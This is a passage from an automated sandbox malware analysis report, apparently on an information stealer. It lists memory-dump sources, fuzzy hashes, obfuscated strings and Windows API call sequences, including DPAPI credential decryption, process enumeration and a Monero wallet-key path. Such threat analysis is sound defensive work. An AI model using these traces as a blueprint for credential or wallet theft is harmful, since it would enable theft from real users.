                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Mc$J=uy$_ix$cB{o$gE?7$E{~
                  • API String ID: 0-99628553
                  • Opcode ID: 40721776725897aa4c74ca6786f9f88d19338dd326f331be15640db1f49c3bca
                  • Instruction ID: 5ec2cc590bc4d2479de3a17a3a075fcf0137a15eb261934b69eb4e9584c028c7
                  • Opcode Fuzzy Hash: 40721776725897aa4c74ca6786f9f88d19338dd326f331be15640db1f49c3bca
                  • Instruction Fuzzy Hash: 66B204F360C6049FE3046E29EC8567ABBE5EF94320F1A493DEAC5C7744EA3598408797
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: AF%o$Kd'y$]+G?$h:{7$t/S?
                  • API String ID: 0-3972565341
                  • Opcode ID: 969eef0a14ca30afb431710f39f9a665da184bfa9cdc2f0ccb6e781a6c7c8afe
                  • Instruction ID: eb406d1fbeea2145ab449135e6f7752f6320bc26bb7aab979b426119ce743d16
                  • Opcode Fuzzy Hash: 969eef0a14ca30afb431710f39f9a665da184bfa9cdc2f0ccb6e781a6c7c8afe
                  • Instruction Fuzzy Hash: C0B217F390C214AFE3046E2DEC8567ABBE9EF94320F16493DEAC4C7740E67558418796
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: !Pws$%u]g$@h>$U=tn$]g{;
                  • API String ID: 0-1203533134
                  • Opcode ID: 248760e5c8c830d1c725f5091bd2d807eb68f80ee847c786af39a25df3752e3e
                  • Instruction ID: 743a2196d54ffc96df0470579b25d281442a76e9674eb41131016786deaa7bb4
                  • Opcode Fuzzy Hash: 248760e5c8c830d1c725f5091bd2d807eb68f80ee847c786af39a25df3752e3e
                  • Instruction Fuzzy Hash: 66B22AF3A082109FE704AE2DEC9577ABBE9EF94320F16463DEAC4D3744E63558018697
                  APIs
                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0087C871
                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0087C87C
                  • lstrcat.KERNEL32(?,00890B46), ref: 0087C943
                  • lstrcat.KERNEL32(?,00890B47), ref: 0087C957
                  • lstrcat.KERNEL32(?,00890B4E), ref: 0087C978
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$BinaryCryptStringlstrlen
                  • String ID:
                  • API String ID: 189259977-0
                  • Opcode ID: c672a84a085b764e728c68d5b00a1189c8c3ce4926da6b93c82500494c9e887f
                  • Instruction ID: e9a3dc5276ac41e117a6f94c8d188e4608e2ad3ffacc572e0a6194e7a71b4830
                  • Opcode Fuzzy Hash: c672a84a085b764e728c68d5b00a1189c8c3ce4926da6b93c82500494c9e887f
                  • Instruction Fuzzy Hash: A64162B590420ADFCB10DF90DC89BEEB7B8FB48304F1042A8E609A7281D7749A85CF91
                  APIs
                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0087724D
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00877254
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00877281
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 008772A4
                  • LocalFree.KERNEL32(?), ref: 008772AE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                  • String ID:
                  • API String ID: 2609814428-0
                  • Opcode ID: 27d9a0916f188c52c4665e469c17b736cd1533fb2d0ee6bf886a183a4b482c7c
                  • Instruction ID: ea8cdaa0882b2d8d88eba856bd1a91e100e3a16bae5a14ca0ffdcdfdfd51c272
                  • Opcode Fuzzy Hash: 27d9a0916f188c52c4665e469c17b736cd1533fb2d0ee6bf886a183a4b482c7c
                  • Instruction Fuzzy Hash: 9B010075A40208BBEB10DFD4CD45F9D7778FB44704F108154FB09EB2D1D670AA018B65
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0088961E
                  • Process32First.KERNEL32(00890ACA,00000128), ref: 00889632
                  • Process32Next.KERNEL32(00890ACA,00000128), ref: 00889647
                  • StrCmpCA.SHLWAPI(?,00000000), ref: 0088965C
                  • CloseHandle.KERNEL32(00890ACA), ref: 0088967A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                  • String ID:
                  • API String ID: 420147892-0
                  • Opcode ID: 31d72e30bfdda2132cffdc9a57837558e05a47a886c54a16239047f64df64a1b
                  • Instruction ID: 378de6bf548da0443cfd543698965280a8dde59899a7a4976047fbed57963faf
                  • Opcode Fuzzy Hash: 31d72e30bfdda2132cffdc9a57837558e05a47a886c54a16239047f64df64a1b
                  • Instruction Fuzzy Hash: 250100B5A00208ABCB14DFE5DD54BEDB7F8FB58300F144288E545D6250EB349B41DF51
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,008905B7), ref: 008886CA
                  • Process32First.KERNEL32(?,00000128), ref: 008886DE
                  • Process32Next.KERNEL32(?,00000128), ref: 008886F3
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                  • CloseHandle.KERNEL32(?), ref: 00888761
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                  • String ID:
                  • API String ID: 1066202413-0
                  • Opcode ID: dd1bf4381759569cd2bbc6eb5fde37b40ad0f24846ecf3863c2a695251847137
                  • Instruction ID: 48ff574ce7b5f63faaa4a7291140aee1dcec14e6f4c5f7d4b2dbf97d710282af
                  • Opcode Fuzzy Hash: dd1bf4381759569cd2bbc6eb5fde37b40ad0f24846ecf3863c2a695251847137
                  • Instruction Fuzzy Hash: 71314A71901218ABDB28FB94CC45FEEB778FB45700F5041AAE50AE21A0DF346A45CFA2
                  APIs
                  • CryptBinaryToStringA.CRYPT32(00000000,00875184,40000001,00000000,00000000,?,00875184), ref: 00888EC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptString
                  • String ID:
                  • API String ID: 80407269-0
                  • Opcode ID: 72f1c4946dc2d3613d1256815db4cd18764bc7e900ae96c99e0a3f319583985a
                  • Instruction ID: 578ff9629cc891f4eeeb3711f1782df99245b9b3f55d1b7533b64ba0b355790f
                  • Opcode Fuzzy Hash: 72f1c4946dc2d3613d1256815db4cd18764bc7e900ae96c99e0a3f319583985a
                  • Instruction Fuzzy Hash: BF110670200208EFDB00DFA4E884FAA37A9FF89304F509548FA19CB251DB35EC41DB60
                  APIs
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00874EEE,00000000,00000000), ref: 00879AEF
                  • LocalAlloc.KERNEL32(00000040,?,?,?,00874EEE,00000000,?), ref: 00879B01
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00874EEE,00000000,00000000), ref: 00879B2A
                  • LocalFree.KERNEL32(?,?,?,?,00874EEE,00000000,?), ref: 00879B3F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptLocalString$AllocFree
                  • String ID:
                  • API String ID: 4291131564-0
                  • Opcode ID: 79eb159e9de22e63dd5e60b3bdad102758f4ee4c3dbcf1ca11903e27c66293b1
                  • Instruction ID: fd77e73d4d66e83ffb90ff5679e0be107385eee836d27ac33e6157867e3fb24f
                  • Opcode Fuzzy Hash: 79eb159e9de22e63dd5e60b3bdad102758f4ee4c3dbcf1ca11903e27c66293b1
                  • Instruction Fuzzy Hash: 4011A4B4240308AFEB10CFA4DC95FAA77B5FB89710F208158F9199B3A4C775A901CB50
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00890E00,00000000,?), ref: 008879B0
                  • RtlAllocateHeap.NTDLL(00000000), ref: 008879B7
                  • GetLocalTime.KERNEL32(?,?,?,?,?,00890E00,00000000,?), ref: 008879C4
                  • wsprintfA.USER32 ref: 008879F3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                  • String ID:
                  • API String ID: 377395780-0
                  • Opcode ID: 6ad3baab7c03d21ae0c02c9f0ce2a41b6e440a6ba9e537ac97c742b6ae524320
                  • Instruction ID: a279785f1b90d3397fed5ac8745c04edb6b94ffef3824fd92f11f218a650d4de
                  • Opcode Fuzzy Hash: 6ad3baab7c03d21ae0c02c9f0ce2a41b6e440a6ba9e537ac97c742b6ae524320
                  • Instruction Fuzzy Hash: 321127B2904118ABCB14DFC9DD45BBEB7F8FB4CB11F10421AF605A2290E2395941CBB1
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,015DD830,00000000,?,00890E10,00000000,?,00000000,00000000), ref: 00887A63
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00887A6A
                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,015DD830,00000000,?,00890E10,00000000,?,00000000,00000000,?), ref: 00887A7D
                  • wsprintfA.USER32 ref: 00887AB7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                  • String ID:
                  • API String ID: 3317088062-0
                  • Opcode ID: e9e115e9420e09a5617cee7e3269ef006c311fa0590f6e57aece1a85cce7a458
                  • Instruction ID: 2eb7b458f78956bb5c0fa4bd42424f284eb6e7cb7f6afd8a000a7b2aedb0f2fc
                  • Opcode Fuzzy Hash: e9e115e9420e09a5617cee7e3269ef006c311fa0590f6e57aece1a85cce7a458
                  • Instruction Fuzzy Hash: 91117CB1945228EBEB20DB94DC49FA9B7B8FB04721F10439AE91A932D0D7745A40CF91
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: !w:$^o{^$ny
                  • API String ID: 0-3038142128
                  • Opcode ID: cd462f84c23f40d1000322aec937154ce4cd265ab4711a9794f16fae1c977833
                  • Instruction ID: b8421a359449f2f6bea1a26c05467d483fc8c31630dbc06282a3e42981f3ecec
                  • Opcode Fuzzy Hash: cd462f84c23f40d1000322aec937154ce4cd265ab4711a9794f16fae1c977833
                  • Instruction Fuzzy Hash: DDA227F390C2009FE7046E2DEC8567ABBE9EB94320F1A493DEAC5C7744EA3558058797
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: T,;$|+[[$8w
                  • API String ID: 0-572241805
                  • Opcode ID: fe06adc2684fa7659c24aa105e2aec81f51e21fb298151dcf51d27632e95d455
                  • Instruction ID: 15b1ae25165e358f8d1d60bbb02d530b767368373e0d4f0c97dc95ac361a3a76
                  • Opcode Fuzzy Hash: fe06adc2684fa7659c24aa105e2aec81f51e21fb298151dcf51d27632e95d455
                  • Instruction Fuzzy Hash: F3920BF36086009FE304AE2DED8566AFBEAEFD4720F1A853DE6C4C7744E63558058792
                  APIs
                  • CoCreateInstance.COMBASE(0088E118,00000000,00000001,0088E108,00000000), ref: 00883758
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 008837B0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharCreateInstanceMultiWide
                  • String ID:
                  • API String ID: 123533781-0
                  • Opcode ID: 15e3a8f3c5186362e8788434c4a175db18164b3392a99ed28161e5c73cbdf6b0
                  • Instruction ID: f6de0f573aa4d34e2bf133ca15d53a4f737948c93cf367cccfb179fe9dc3083b
                  • Opcode Fuzzy Hash: 15e3a8f3c5186362e8788434c4a175db18164b3392a99ed28161e5c73cbdf6b0
                  • Instruction Fuzzy Hash: 6941F674A00A28AFDB24DB58CC95B9BB7B4FB48702F4041D8E618E7290E771AE85CF50
                  APIs
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00879B84
                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00879BA3
                  • LocalFree.KERNEL32(?), ref: 00879BD3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$AllocCryptDataFreeUnprotect
                  • String ID:
                  • API String ID: 2068576380-0
                  • Opcode ID: 7d596d0bc6b55c2cfb4ab88c3567c0d08bebeb8fb62d9ae55efa21f076ad996e
                  • Instruction ID: 36ae35bc7f6977da127617f015240ee7fafdfc102bace148f54dd184316e5878
                  • Opcode Fuzzy Hash: 7d596d0bc6b55c2cfb4ab88c3567c0d08bebeb8fb62d9ae55efa21f076ad996e
                  • Instruction Fuzzy Hash: 7C1109B8A00209EFDB04DF94D985AAEB7B5FF89300F108598E815A7350D770AE11CFA1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: +9Rv$zy?{
                  • API String ID: 0-3790884527
                  • Opcode ID: e50b9526e2b491d9846296664c60b3726679024d2c80ed4234134d06efa60b93
                  • Instruction ID: 9a63458ffba3841d33f69c532353ba7c9d995f58fb4548a9dcf37a04f7a211c3
                  • Opcode Fuzzy Hash: e50b9526e2b491d9846296664c60b3726679024d2c80ed4234134d06efa60b93
                  • Instruction Fuzzy Hash: B8B236F3A0C2049FE304AE2DEC8567AFBE9EB94720F16493DE6C4C7344EA7558058697
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 1G$yrK
                  • API String ID: 0-3332173542
                  • Opcode ID: c498587dc2458f2109be885648b97e83c689890bca0c17c2ceb0c071e8ff9493
                  • Instruction ID: 830adaec10326eda77e2b5e330a98eac2cb9726e3dcc18e02b66687d7e66aa21
                  • Opcode Fuzzy Hash: c498587dc2458f2109be885648b97e83c689890bca0c17c2ceb0c071e8ff9493
                  • Instruction Fuzzy Hash: 355126B3E093285BF300BE79DC45366F7DAEB94360F1A863DEA8893744E9755C0582D2
                  Strings
                  Memory Dump Source
